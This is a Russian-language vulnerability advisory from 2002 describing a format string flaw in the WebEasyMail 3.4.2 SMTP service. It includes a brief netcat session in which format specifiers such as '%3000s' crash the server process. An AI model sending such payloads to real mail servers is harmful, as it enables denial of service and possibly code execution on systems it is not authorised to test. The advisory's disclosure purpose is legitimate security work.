Выполнение произвольного кода в WebEasyMail

Дата публикации:
22.08.2002
Всего просмотров:
639
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: В WebEasyMail обнаружена уязвимость форматной строки в SMTP службе. Удаленный пользователь может передать спецификатор формата, который приведет нарушению структуры памяти и переполнению буфера. Уязвимость может использоваться для выполнения произвольного кода. Пример:
$ nc localhost 25
220 ESMTP on WebEasyMail [3.4.2.2] ready.  http://www.winwebmail.com
%2
502 Error: command not implemented
%2s
502 Error: command not implemented
%100s
502 Error: command not implemented
%3000s
[emsrv.exe silently dies here]
$
уязвимость обнаружена в WebEasyMail 3.4.2

Ссылки: Advisory: DoS in WebEasyMail +more possible?
или введите имя

CAPTCHA